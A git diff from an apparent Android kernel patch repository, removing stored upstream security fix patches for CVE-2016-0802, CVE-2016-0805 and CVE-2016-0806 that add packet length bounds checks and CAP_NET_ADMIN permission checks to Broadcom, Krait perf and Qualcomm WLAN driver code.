- extern int dhd_socram_dump(struct dhd_bus *bus);
- #ifdef DNGL_EVENT_SUPPORT
- static void dngl_host_event_process(dhd_pub_t *dhdp, bcm_dngl_event_t *event);
--static int dngl_host_event(dhd_pub_t *dhdp, void *pktdata);
-+static int dngl_host_event(dhd_pub_t *dhdp, void *pktdata, size_t pktlen);
- #endif /* DNGL_EVENT_SUPPORT */
- bool ap_cfg_running = FALSE;
- bool ap_fw_loaded = FALSE;
-@@ -1380,7 +1380,7 @@
- #ifdef DNGL_EVENT_SUPPORT
- /* Check whether packet is a BRCM dngl event pkt. If it is, process event data. */
- int
--dngl_host_event(dhd_pub_t *dhdp, void *pktdata)
-+dngl_host_event(dhd_pub_t *dhdp, void *pktdata, size_t pktlen)
- {
- bcm_dngl_event_t *pvt_data = (bcm_dngl_event_t *)pktdata;
-
-@@ -1391,14 +1391,14 @@
- /* Check to see if this is a DNGL event */
- if (ntoh16_ua((void *)&pvt_data->bcm_hdr.usr_subtype) ==
- BCMILCP_BCM_SUBTYPE_DNGLEVENT) {
-- dngl_host_event_process(dhdp, pvt_data);
-+ dngl_host_event_process(dhdp, pvt_data, pktlen);
- return BCME_OK;
- }
- return BCME_ERROR;
- }
-
- void
--dngl_host_event_process(dhd_pub_t *dhdp, bcm_dngl_event_t *event)
-+dngl_host_event_process(dhd_pub_t *dhdp, bcm_dngl_event_t *event, size_t pktlen)
- {
- bcm_dngl_event_msg_t *dngl_event = &event->dngl_event;
- uint8 *p = (uint8 *)(event + 1);
-@@ -1407,6 +1407,9 @@
- uint16 version = ntoh16_ua((void *)&dngl_event->version);
-
- DHD_EVENT(("VERSION:%d, EVENT TYPE:%d, DATALEN:%d\n", version, type, datalen));
-+ if (datalen > (pktlen - sizeof(bcm_event_t))) {
-+ return;
-+ }
- if (version != BCM_DNGL_EVENT_MSG_VERSION) {
- DHD_ERROR(("%s:version mismatch:%d:%d\n", __FUNCTION__,
- version, BCM_DNGL_EVENT_MSG_VERSION));
-@@ -1499,7 +1502,7 @@
- }
- #endif /* DNGL_EVENT_SUPPORT */
-
--int wl_host_event(dhd_pub_t *dhd_pub, int *ifidx, void *pktdata,
-+int wl_host_event(dhd_pub_t *dhd_pub, int *ifidx, void *pktdata, size_t pktlen,
- wl_event_msg_t *event, void **data_ptr, void *raw_event)
- {
- /* check whether packet is a BRCM event pkt */
-@@ -1512,7 +1515,7 @@
-
- #ifdef DNGL_EVENT_SUPPORT
- /* If it is a DNGL event process it first */
-- if (dngl_host_event(dhd_pub, pktdata) == BCME_OK) {
-+ if (dngl_host_event(dhd_pub, pktdata, pktlen) == BCME_OK) {
- /* Return error purposely to prevent DNGL event being processed as BRCM event */
- return BCME_ERROR;
- }
-@@ -1529,18 +1532,27 @@
- return (BCME_ERROR);
- }
-
-+ if (pktlen < sizeof(bcm_event_t))
-+ return (BCME_ERROR);
-+
- *data_ptr = &pvt_data[1];
- event_data = *data_ptr;
-
--
- /* memcpy since BRCM event pkt may be unaligned. */
- memcpy(event, &pvt_data->event, sizeof(wl_event_msg_t));
-
- type = ntoh32_ua((void *)&event->event_type);
- flags = ntoh16_ua((void *)&event->flags);
- status = ntoh32_ua((void *)&event->status);
-+
- datalen = ntoh32_ua((void *)&event->datalen);
-+ if (datalen > pktlen)
-+ return (BCME_ERROR);
-+
- evlen = datalen + sizeof(bcm_event_t);
-+ if (evlen > pktlen) {
-+ return BCME_ERROR;
-+ }
-
- /* find equivalent host index for event ifidx */
- hostidx = dhd_ifidx2hostidx(dhd_pub->info, event->ifidx);
-diff --git a/drivers/net/wireless/bcmdhd/dhd_linux.c b/drivers/net/wireless/bcmdhd/dhd_linux.c
-index 3998402..7c0563a 100644
---- a/drivers/net/wireless/bcmdhd/dhd_linux.c
-+++ b/drivers/net/wireless/bcmdhd/dhd_linux.c
-@@ -700,7 +700,7 @@
- static int dhd_toe_set(dhd_info_t *dhd, int idx, uint32 toe_ol);
- #endif /* TOE */
-
--static int dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata,
-+static int dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen,
- wl_event_msg_t *event_ptr, void **data_ptr);
- #ifdef DHD_UNICAST_DHCP
- static const uint8 llc_snap_hdr[SNAP_HDR_LEN] = {0xaa, 0xaa, 0x03, 0x00, 0x00, 0x00};
-@@ -3018,6 +3018,7 @@
- #else
- skb->mac.raw,
- #endif /* LINUX_VERSION_CODE >= KERNEL_VERSION(2, 6, 22) */
-+ len - 2,
- &event,
- &data);
-
-@@ -7452,16 +7453,18 @@
- #endif /* defined(WL_WIRELESS_EXT) */
-
- static int
--dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata,
-+dhd_wl_host_event(dhd_info_t *dhd, int *ifidx, void *pktdata, size_t pktlen,
- wl_event_msg_t *event, void **data)
- {
- int bcmerror = 0;
- ASSERT(dhd != NULL);
-
- #ifdef SHOW_LOGTRACE
-- bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, event, data, &dhd->event_data);
-+ bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, pktlen,
-+ event, data, &dhd->event_data);
- #else
-- bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, event, data, NULL);
-+ bcmerror = wl_host_event(&dhd->pub, ifidx, pktdata, pktlen,
-+ event, data, NULL);
- #endif /* SHOW_LOGTRACE */
-
- if (bcmerror != BCME_OK)
diff --git a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch.base64
deleted file mode 100644
index 35ff7ed6..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0802/ANY/0001.patch.base64
+++ /dev/null
@@ -1 +0,0 @@
-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
\ No newline at end of file
diff --git a/Patches/Linux_CVEs/CVE-2016-0805/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2016-0805/ANY/0001.patch
deleted file mode 100644
index 7bcaa942..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0805/ANY/0001.patch
+++ /dev/null
@@ -1,58 +0,0 @@
-From b3f0b1f694258b3b3debc5256eec94bb2a9eb454 Mon Sep 17 00:00:00 2001
-From: Swetha Chikkaboraiah
-Date: Wed, 27 Jan 2016 11:46:54 +0530
-Subject: [PATCH] msm: perf: Protect buffer overflow due to malicious user
-
-In function krait_pmu_disable_event, parameter hwc comes from
-userspace and is untrusted.The function krait_clearpmu is called
-after the function get_krait_evtinfo.
-Function get_krait_evtinfo as parameter krait_evt_type variable
-which is used to extract the groupcode(reg) which is bound to
- KRAIT_MAX_L1_REG (is 3). After validation,one code path modifies
-groupcode(reg):If this code path executes, groupcode(reg) can be
-3,4, 5, or 6. In krait_clearpmu groupcode used to access array
-krait_functions whose size is 3. Since groupcode can be 3,4,5,6
-accessing array krait_functions lead to bufferoverlflow.
-This change will validate groupcode not to exceed 3.
-
-CVE-2016-0805 Bug:ANDROID-25773204
-
-Change-Id: I48c92adda137d8a074b4e1a367a468195a810ca1
-CRs-fixed: 962450
-Signed-off-by: Swetha Chikkaboraiah
-Signed-off-by: Karthik Jadala
----
- arch/arm/kernel/perf_event_msm_krait.c | 8 ++++----
- 1 file changed, 4 insertions(+), 4 deletions(-)
-
-diff --git a/arch/arm/kernel/perf_event_msm_krait.c b/arch/arm/kernel/perf_event_msm_krait.c
-index 49aae5a66b650..34f9b4e5b099d 100644
---- a/arch/arm/kernel/perf_event_msm_krait.c
-+++ b/arch/arm/kernel/perf_event_msm_krait.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2011-2014, The Linux Foundation. All rights reserved.
-+ * Copyright (c) 2011-2014, 2016 The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -208,9 +208,6 @@ static unsigned int get_krait_evtinfo(unsigned int krait_evt_type,
- code = (krait_evt_type & 0x00FF0) >> 4;
- group = krait_evt_type & 0x0000F;
-
-- if ((group > 3) || (reg > KRAIT_MAX_L1_REG))
-- return -EINVAL;
--
- if (prefix != KRAIT_EVT_PREFIX && prefix != KRAIT_VENUMEVT_PREFIX)
- return -EINVAL;
-
-@@ -221,6 +218,9 @@ static unsigned int get_krait_evtinfo(unsigned int krait_evt_type,
- reg += VENUM_BASE_OFFSET;
- }
-
-+ if ((group > 3) || (reg > KRAIT_MAX_L1_REG))
-+ return -EINVAL;
-+
- evtinfo->group_setval = 0x80000000 | (code << (group * 8));
- evtinfo->groupcode = reg;
- evtinfo->armv7_evt_type = evt_type_base[reg] | group;
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0001.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0001.patch
deleted file mode 100644
index db0a3b88..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0001.patch
+++ /dev/null
@@ -1,41 +0,0 @@
-From 1fac73337080712109029302599945d1ac36c799 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 09:55:27 -0700
-Subject: wlan:Check priviledge permission before processing
-
-for SET_OEM_DATA_REQ IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_OEM_DATA_REQ IOCTLs, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I651656fe11d4235232b76c972b5460b57e608449
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c | 6 ++++++
- 1 file changed, 6 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c
-index c796abd..2bbb38f 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_oemdata.c
-@@ -203,6 +203,12 @@ int iw_set_oem_data_req(
- hdd_adapter_t *pAdapter = (netdev_priv(dev));
- hdd_wext_state_t *pwextBuf = WLAN_HDD_GET_WEXT_STATE_PTR(pAdapter);
-
-+ if (!capable(CAP_NET_ADMIN)) {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0002.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0002.patch
deleted file mode 100644
index 83db5256..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0002.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From e9dcd5aa01734b019c793220531e4ef1d82959f8 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 10:06:03 -0700
-Subject: wlan:Check priviledge permission before processing
-
-for SET_CHAR_GET_NONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_CHAR_GET_NONE IOCTLs, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: Iccf25a9d1f1a7c13d3aaf2fc4bd3aebba740dbb2
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 964ed65..5e03595 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -3864,6 +3864,13 @@ static int iw_setchar_getnone(struct net_device *dev, struct iw_request_info *in
- hdd_config_t *pConfig = pHddCtx->cfg_ini;
- #endif /* WLAN_FEATURE_VOWIFI */
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received length %d", __func__, wrqu->data.length);
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO, "%s: Received data %s", __func__, (char*)wrqu->data.pointer);
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0003.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0003.patch
deleted file mode 100644
index 01eb45b2..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0003.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From fd13b59e5a75b761f68fe34f09df1dce7a49acc2 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 10:11:40 -0700
-Subject: wlan:Check priviledge permission before processing
-
-for SET_PACKET_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_PACKET_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I1edc65ee26c5e3e4260e0f6546434b0137493396
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 5e03595..6a806f4 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -5834,6 +5834,13 @@ static int iw_set_packet_filter_params(struct net_device *dev, struct iw_request
- hdd_adapter_t *pAdapter = WLAN_HDD_GET_PRIV_PTR(dev);
- tpPacketFilterCfg pRequest = (tpPacketFilterCfg)wrqu->data.pointer;
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- return wlan_hdd_set_filter(WLAN_HDD_GET_CTX(pAdapter), pRequest, pAdapter->sessionId);
- }
- #endif
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0004.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0004.patch
deleted file mode 100644
index 76ca4267..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0004.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From fbb8f120ee729d47869f0bebe5bc31e83bcf2876 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 10:28:36 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_VAR_INTS_GETNONE IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_VAR_INTS_GETNONE, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: Ia2465433aab6366160a167a62ca03e0ba720bcdb
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 6a806f4..9b41a5e 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -4508,6 +4508,13 @@ int iw_set_var_ints_getnone(struct net_device *dev, struct iw_request_info *info
- int cmd = 0;
- int staId = 0;
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- hddLog(LOG1, "%s: Received length %d", __func__, wrqu->data.length);
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0005.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0005.patch
deleted file mode 100644
index 9dcb2242..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0005.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 518fd80981eefa9715e0851260b2c7aeb86551d7 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 10:34:06 -0700
-Subject: wlan:Check priviledge permission
-
-for QCSAP_IOCTL_SETWPSIE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_SETWPSIE IOCTL,
-making sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I66acff95d6151b32f1cb3c36a164e1de021e1e30
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-index 45c6f78..7598b99 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -2147,6 +2147,13 @@ static int iw_softap_setwpsie(struct net_device *dev,
- u_int16_t length;
- ENTER();
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if(!wrqu->data.length)
- return 0;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0006.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0006.patch
deleted file mode 100644
index 711c3224..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0006.patch
+++ /dev/null
@@ -1,44 +0,0 @@
-From 86fd66a451b2549f990b71013220e0a3f46b5a00 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 10:41:41 -0700
-Subject: wlan:Check priviledge permission
-
-for QCSAP_IOCTL_DISASSOC_STA
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing QCSAP_IOCTL_DISASSOC_STA IOCTL,
-making sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I7928789c0ce94a2b81495064496766b9e62d6ed8
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c | 9 ++++++++-
- 1 file changed, 8 insertions(+), 1 deletion(-)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-index 7598b99..005c193 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_hostapd.c
-@@ -1338,7 +1338,14 @@ static iw_softap_disassoc_sta(struct net_device *dev,
- {
- hdd_adapter_t *pHostapdAdapter = (netdev_priv(dev));
- v_U8_t *peerMacAddr;
--
-+
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- ENTER();
- /* iwpriv tool or framework calls this ioctl with
- * data passed in extra (less than 16 octets);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0007.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0007.patch
deleted file mode 100644
index 168843a4..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0007.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 4a75c965d2505ca2490a365a27309cc9dd68b2d1 Mon Sep 17 00:00:00 2001
-From: Hanumantha Reddy Pothula
-Date: Thu, 17 Mar 2016 10:54:37 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_THREE_INT_GET_NONE
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_THREE_INT_GET_NONE IOCTL,
-making sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I8661872786adfb5492da505ba3960e62064ddd7e
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 9b41a5e..1288bd0 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -4049,6 +4049,13 @@ int iw_set_three_ints_getnone(struct net_device *dev, struct iw_request_info *in
- int sub_cmd = value[0];
- int ret = 0;
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
- {
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_FATAL,
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0008.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0008.patch
deleted file mode 100644
index a1c03826..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0008.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From ede034fd604a9cdb20eb7accdaec4a8e70ffac41 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 16:55:17 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_BAND_CONFIG IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_BAND_CONFIG IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I34e9d91f778b09eb73881aed5c6e3a10cbbd208c
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 1288bd0..7add243 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6499,6 +6499,13 @@ static int iw_set_band_config(struct net_device *dev,
- tANI_U8 *ptr = (tANI_U8*)wrqu->data.pointer;
- int ret = 0;
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,"%s: ", __func__);
-
- if ((WLAN_HDD_GET_CTX(pAdapter))->isLogpInProgress)
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0009.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0009.patch
deleted file mode 100644
index ad265a8a..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0009.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From aaf7476fa7fdc8d1865f20217c7c57ce561e03f7 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 17:00:41 -0700
-Subject: wlan:Check priviledge permission
-
-for SET_POWER_PARAMS IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing SET_POWER_PARAMS IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: Iaab3d55c2acc75f65d6daf5998713cc9ff92a32c
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 7add243..85d881a 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -6529,6 +6529,13 @@ static int iw_set_power_params_priv(struct net_device *dev,
- struct iw_request_info *info,
- union iwreq_data *wrqu, char *extra)
- {
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_INFO,
- "Set power params Private");
- return iw_set_power_params(dev,info,wrqu,extra,0);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0010.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0010.patch
deleted file mode 100644
index 8a69b78c..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0010.patch
+++ /dev/null
@@ -1,42 +0,0 @@
-From 973503f0d411e13e01fa10c5ea802dcb8a12cf85 Mon Sep 17 00:00:00 2001
-From: Mukul Sharma
-Date: Thu, 17 Mar 2016 17:03:19 -0700
-Subject: wlan:Check priviledge permission
-
-for CLEAR_MCBC_FILTER IOCTL
-
-Kernel assumes all SET IOCTL commands are assigned with even
-numbers. But in our WLAN driver, some SET IOCTLS are assigned with
-odd numbers. This leads kernel fail to check, for some SET IOCTLs,
-whether user has the right permission to do SET operation.
-Hence, in driver, before processing CLEAR_MCBC_FILTER IOCTL, making
-sure user task has right permission to process the command.
-
-Bug: 27104184
-Change-Id: I2332845fa6793dc63b6f397a9ebf53d37a52a7c7
-Signed-off-by: Yuan Lin
----
- drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c | 7 +++++++
- 1 file changed, 7 insertions(+)
-
-diff --git a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-index 85d881a..558fc1b 100644
---- a/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-+++ b/drivers/staging/prima/CORE/HDD/src/wlan_hdd_wext.c
-@@ -5306,6 +5306,13 @@ static int iw_clear_dynamic_mcbc_filter(struct net_device *dev,
- tpSirWlanSetRxpFilters wlanRxpFilterParam;
- hddLog(VOS_TRACE_LEVEL_INFO_HIGH, "%s: ", __func__);
-
-+ if (!capable(CAP_NET_ADMIN))
-+ {
-+ VOS_TRACE(VOS_MODULE_ID_HDD, VOS_TRACE_LEVEL_ERROR,
-+ FL("permission check failed"));
-+ return -EPERM;
-+ }
-+
- //Reset the filter to INI value as we have to clear the dynamic filter
- pHddCtx->configuredMcastBcastFilter = pHddCtx->cfg_ini->mcastBcastFilterSetting;
-
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2016-0806/prima/0011.patch b/Patches/Linux_CVEs/CVE-2016-0806/prima/0011.patch
deleted file mode 100644
index 4813af33..00000000
--- a/Patches/Linux_CVEs/CVE-2016-0806/prima/0011.patch
+++ /dev/null
@@ -1,117 +0,0 @@
-From 34953f9f66d9cd36616c5271a7d285b31d9142c2 Mon Sep 17 00:00:00 2001
-From: Mahesh A Saptasagar
-Date: Thu, 17 Mar 2016 17:15:02 -0700
-Subject: qcacld 2.0: Validate WPA and RSN IE for valid length
-
-prima to qcacld-2.0 propagation
-
